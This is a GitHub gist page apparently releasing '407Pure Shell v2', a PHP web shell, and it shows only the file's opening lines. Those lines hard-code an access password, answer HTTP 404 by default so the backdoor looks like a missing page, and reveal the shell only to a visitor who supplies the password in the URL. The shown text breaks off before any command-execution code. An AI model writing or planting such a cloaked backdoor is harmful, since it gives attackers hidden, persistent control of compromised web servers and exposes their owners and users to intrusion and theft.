Skip to content

Instantly share code, notes, and snippets.

View menkrep1337's full-sized avatar
☺️
Busy

menkrep1337 menkrep1337

☺️
Busy
View GitHub Profile
@menkrep1337
menkrep1337 / 407-2.php
Last active March 13, 2019 13:21
407Pure Shell v2 - Release
<?
///////
$pass="herp1337"; // Ganti Password
///////
http_response_code(404);
if(isset($_GET["login"])){
global $pass;
if($_GET["login"]==$pass) http_response_code(200);
else{
die();